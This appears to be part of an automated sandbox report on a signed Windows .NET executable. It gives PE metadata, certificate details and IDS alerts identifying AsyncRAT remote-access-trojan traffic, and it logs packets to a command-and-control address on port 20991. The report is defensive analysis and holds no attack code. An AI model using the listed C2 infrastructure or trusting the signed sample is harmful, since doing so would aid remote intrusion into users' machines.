                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Time Stamp:0xBC79720B [Sat Mar 15 02:20:59 2070 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                Authenticode Signature

                Signature Valid:true
                Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
                Signature Validation Error:The operation completed successfully
                Error Number:0
                Not Before, Not After
                • 18/03/2024 01:00:00 18/04/2025 01:59:59
                Subject Chain
                • CN=Munish Walia, O=Munish Walia, S=Punjab, C=IN
                Version:3
                Thumbprint MD5:84620E59BCC75E9243C975DCBA4F8685
                Thumbprint SHA-1:5A168F8DEFECA0DF26C330937FAF04A2BE34D879
                Thumbprint SHA-256:5B799ED539CADF85859FA8553349A3985E208EC4438836CE1CEA228FFC6CD61A
                Serial:786E6B5A7F502A65A479D72822A8B2B7

                Entrypoint Preview

                Instruction
                jmp dword ptr [00402000h]
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al
                add byte ptr [eax], al

                Data Directories

                NameVirtual AddressVirtual Size Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IMPORT0x50c00x4b.text
                IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x10fdc.rsrc
                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                IMAGE_DIRECTORY_ENTRY_SECURITY0x146000x28c8.rsrc
                IMAGE_DIRECTORY_ENTRY_BASERELOC0x180000xc.reloc
                IMAGE_DIRECTORY_ENTRY_DEBUG0x50a40x1c.text
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                Sections

                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                .text0x20000x31140x32007f9e56ab8be5e3e8b1df38e8be9386cbFalse0.63578125SysEx File - Matsushita6.283552590397781IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .rsrc0x60000x10fdc0x110008cc48e06119181d11f1f5d5c28eafd2dFalse0.17637005974264705data5.9140904081711705IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                .reloc0x180000xc0x20036739f2453b766ee5dd5064c822ef55bFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                Resources

                NameRVASizeTypeLanguageCountryZLIB Complexity
                RT_ICON0x61000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.16868271619543357
                RT_GROUP_ICON0x169380x14data1.15
                RT_VERSION0x1695c0x3ecdata0.3844621513944223
                RT_MANIFEST0x16d580x27fXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.4647887323943662

                Imports

                DLLImport
                mscoree.dll_CorExeMain

                Network Behavior

                Snort IDS Alerts

                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                04/19/24-11:37:15.963600TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)880849710204.12.199.30192.168.2.7
                04/19/24-11:37:15.963600TCP2035595ET TROJAN Generic AsyncRAT Style SSL Cert880849710204.12.199.30192.168.2.7

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Apr 19, 2024 11:37:07.701522112 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.834212065 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.834311962 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.834968090 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.981703997 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982209921 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982268095 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982284069 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982301950 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982320070 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982340097 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982340097 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982340097 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982347965 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982352018 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982386112 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982399940 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982400894 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982410908 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982439995 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982439995 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982470989 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982489109 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982507944 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982507944 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982525110 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982533932 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982539892 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982551098 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982557058 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982573032 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982573986 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982584000 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982590914 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:07.982598066 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982621908 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:07.982634068 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.114850998 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.114885092 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.114903927 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.114921093 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.114936113 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.115041971 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.115088940 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.115092039 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.115151882 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.120349884 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.212794065 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.253525972 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.253576040 CEST2099149708204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.253650904 CEST4970820991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.345808983 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.345896959 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.346025944 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.495069027 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.495799065 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.495817900 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.495834112 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.495857000 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.495873928 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.495898008 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.495898008 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.495903015 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.495919943 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.495929956 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.495945930 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.495964050 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496026039 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496041059 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496056080 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496063948 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496078014 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496087074 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496093988 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496123075 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496141911 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496141911 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496151924 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496170044 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496171951 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496207952 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496226072 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496243954 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496260881 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.496263981 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496280909 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.496299028 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.627788067 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.627815008 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.627834082 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.627868891 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.627906084 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.627919912 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.627937078 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.627973080 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.628004074 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628021002 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628036022 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628052950 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628061056 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.628071070 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628092051 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.628092051 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.628139973 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628155947 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628175020 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628180981 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.628212929 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.628218889 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628249884 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.628307104 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.628319979 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.759912014 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.759937048 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.759953976 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.759964943 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.759979010 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.760025024 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.760042906 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.760042906 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.760056973 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.760143995 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.760171890 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.760190010 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.760207891 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.760215998 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.760226011 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.760250092 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.760266066 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.891976118 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892004013 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892066956 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892132044 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892165899 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.892174006 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892213106 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892235994 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.892252922 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892272949 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.892292023 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892328978 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892365932 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:08.892385006 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:08.892410040 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.024297953 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024324894 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024344921 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024363041 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024382114 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024399996 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024408102 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.024447918 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.024456978 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.024502039 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024544954 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.024552107 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024605989 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.024616957 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024633884 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.024678946 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.024692059 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.156305075 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156352997 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156377077 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156383991 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156390905 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156409979 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156410933 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.156429052 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156451941 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.156455040 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156476974 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156492949 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.156497002 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.156517982 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.156539917 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.288346052 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288378000 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288397074 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288414001 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288429976 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288438082 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.288448095 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288471937 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.288465023 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288491011 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288507938 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288520098 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.288525105 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.288541079 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.288557053 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.420638084 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420677900 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420685053 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420691013 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420711040 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420727968 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420744896 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420748949 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.420762062 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420779943 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420788050 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.420804024 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.420814991 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.420845985 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.552757025 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.552834988 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.552874088 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.552908897 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.552932024 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.552973986 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.553011894 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.553030968 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.553067923 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.553080082 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.553109884 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.553148985 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.553157091 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.553188086 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.553227901 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.685112953 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685147047 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685163021 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685180902 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685198069 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685214043 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685224056 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.685230017 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685246944 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685261965 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.685262918 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685262918 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.685286045 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685287952 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.685322046 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.685334921 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.685372114 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.817135096 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817166090 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817184925 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817200899 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817220926 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817240000 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817241907 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.817257881 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817275047 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817284107 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.817292929 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817301989 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.817312956 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817321062 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.817331076 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.817358971 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.817358971 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.817405939 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.949321985 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949346066 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949363947 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949381113 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949397087 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949414015 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949434042 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949450970 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949448109 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.949448109 CEST4970920991192.168.2.7204.12.199.30
                Apr 19, 2024 11:37:09.949469090 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949484110 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949501038 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949517965 CEST2099149709204.12.199.30192.168.2.7
                Apr 19, 2024 11:37:09.949551105 CEST4970920991192.168.2.7204.12.199.30
